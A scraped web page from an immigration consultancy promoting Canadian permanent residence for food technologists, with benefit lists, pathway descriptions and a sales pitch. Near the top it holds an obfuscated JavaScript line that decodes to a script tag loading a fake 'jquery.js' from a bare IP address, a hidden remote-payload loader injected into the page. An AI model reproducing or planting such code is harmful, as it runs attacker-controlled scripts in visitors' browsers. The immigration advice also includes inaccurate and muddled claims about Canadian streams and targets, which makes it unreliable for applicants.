Nationwide Visas
Latest News
Nationwide Immigration » Latest-news » Canada PR for Food Technologist
var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

Canadian PR Visa for Food Technologist

Find Out if you’re eligibile to get Permanent Resident Visa or Not?

 Check Your Eligibility Requirements First

Canada PR Visa Process for Food Technologist

Canada is one of the most premier nations in the world for Immigration. Not only does it offer great job opportunities to people, but it also has a booming economy where certain jobs like food technologists are in high demand. What’s more, the IRCC, which is Canada’s top immigration body, recently announced that it is going to invite over 1 million people into Canada. So, if you have ever dreamed of moving to Canada and starting a great life there, now is the time to apply.

On this page, we are going to talk about all the reasons why you should seriously consider applying for Canada immigration as a Permanent Resident. We will also look at the various immigration pathway, how to apply for them and how Nationwide Immigration can help you achieve immigration to Canada in the quickest time possible.

  Want to move to Canada in 2018, then you must read through this article. Let’s start by looking at all the reasons you should move to Canada:

Top Benefits of Moving to Canada as a Permanent Resident

  • Canada is one of the most liberal countries in the world. It has a very progressive government which is highly welcoming of new immigrants.
  • Canada already has a very large community of Indian immigrants who are very helpful and close-knit. So, moving to Canada will just be like moving to some other part of India.
  • Canada is one of the most diverse economies in the world. It offers a wide range of job opportunities to working professionals with enough experience.
  • Canada offers multiple pathways for immigration. Along with the Express Entry program, it also offers Provincial Nomination Programs which have a relatively easier immigration criterion.
  • Applying for Canada immigration as Permanent Resident is rather easy and simple. However, this also means there is stiff competition for it. Best thing though, you can apply free of cost.
  • Canada allows people to move to the country even without a job offer if they have enough experience and their job is in high-demand.
  • Canada gives all its PRs many benefits with include free education, free healthcare, protection under the law and many more.
  • Canada wants to bring in as many as 1 million people into the country by 2018. This means that chances of moving to Canada are better than ever.
  • Canada has some of the best rated international higher education systems in the world. So, you children can get a world-class education and become skilled professionals easily.
  • Canada allows PRs to become full-citizens just after 3 years of living in the country. Once that is done, you will be able to enter politics and even hold high-security jobs.

Top Immigration Pathways into Canada as a Permanent Resident

Canada offers multiple pathways for immigration into its borders and gives everyone a fair chance of moving to the country. Here is a list of the most popular immigration pathways into Canada:

  • Express Entry
  • Express Entry is the national, federal immigration pathway that offers multiple streams for immigration to work professionals who want to move to Canada as Permanent Residents. Here are the two main immigration streams that are ideal for food technologists who want to move to Canada:

    • Federal Skilled Worker Program
    • FSWP is by far the most popular Canada immigration stream among all other Express Entry immigration pathways. This stream works on the premise of the Comprehensive Ranking System. In it, you will be required to provide particulars about yourself like age, education, work experience, language ability etc. We recommend you have documents ready to validate the information you provide before you start applying. Check out our documents required for Canada immigration page for more information. This stream requires you to have a valid job offer in order to immigrate. But will many opportunities in Canada for food technologists, doing that should not be hard.

    • Occupation in-Demand
    • OiD is a stream that has been established recently but has become very popular because it allows immigrants to move to Canada without a job offer. It works on the same premise as the FSWP and also uses the CRS system to estimate an applicant’s eligibility to move to Canada. If you are selected, then you can move to the country with your family without a job offer. However, you will need a Proof of Funds documents showing that you have enough money to support yourself and your family in Canada for at least 3 to 6 months while you look for a job.

  • Provincial Nomination Programs
  • Just as the Express Entry program is the main immigration program for all of Canada, PNPs are meant to help in immigration to specific provinces. For food technologists, the best provinces to move to are Nova Scotia and Saskatchewan since they have the highest demand for this particular job. Just like the Express Entry program, PNPs also offer multiple pathways into specific provinces. These are:

    • Express Entry pathway
    • This immigration channel is like the FSWP in that it uses the CRS system and job requirement to process applicants. You will need to provide details about yourself and get a score based on which your immigration application will be processed. Note that different provinces have different eligibility criteria, so you should check with our Canada immigration experts before you apply.

    • Occupation in-Demand
    • This pathway is specifically meant for those individuals whose jobs are in high demand in the province you are looking to apply to. Just like the Express Entry OiD path, this stream allows you to move to the given province without a job offer. However, you job must be in high demand and you must have enough money to support yourself and your family for at least 3 to 6 months.

Choosing which stream to apply through can be hard. However, if you choose the right one, you can have a good chance of getting selected. That is why we will recommend you get in touch with our Canada immigration experts to know which immigrations stream will be the best for you.

Now, let us look at how to apply for each of these streams.

How to Apply for Canada Immigration

First, we are going to look at the Express Entry program as this is the main pathway for immigration into Canada. Here are the steps you need to follow to apply:

  • Go to the IRCC website and fill out the Express Entry form. Provide details about yourself like age, education, work experience, language ability etc. Make sure you submit the right documents to get processed quickly.
  • Once your CRS score is calculated, you should see how you chances of immigrating are based on the last Express Entry draw and try to get your CRS score as high as possible.
  • One of the ways of doing this is finding a job. After your Express Entry profile has been selected, you will be entered into the Express Entry job pool. You can use this to look for a suitable job and enhance your immigration chances.
  • Now, you should check out if your job is in high demand and consider applying through the Occupation in-demand stream if it is. We recommend you talk to our experts before you do though.
  • After doing all the necessary things to apply through Express Entry, you should apply for PNP as well. This will give you a higher chance of getting selected.
  • To do this, go to the dedicated immigration site of the provinces and follow the same application procedure that you did in PNP. If you are selected, you will be given a Provincial Nomination which will guarantee your immigration.
  • Now, you need to wait for the Express Entry draws. If selected, you will get an Invitation to Apply. Once you have that, you will have 90 days to apply for a PR visa after which, you will have 1 year to move to Canada.

Now, let us look at how Nationwide Immigration can help you.

Why Choose Nationwide Immigration?

Ranked among the top 3 Canada immigration consultancies in India, Nationwide Immigration has helped over 10,000 immigrants move to Canada in the last 10 years. Our record speaks for itself. But that’s not all, we also offer a range of services like IELTS training, documentation help, rejection case analysis, legal consultation etc. to help you move as fast as possible. In addition, we also have very friendly policies like 100% refund on rejection, legal contracts, expert consultation etc. that make sure you get what you pay for. If you are looking for the best in the business to help you move to Canada in record time, then Nationwide Immigration is the answer! Fill out our free assessment form today and get started on making your Canada immigration dreams come true!

No reviews were found.

Leave a Reply

How can we help ?
Call   011-46177777
or Submit Below
24 Hour Response time





Important Links


Our Client's Testimonails
Nationwide Immigration Consultants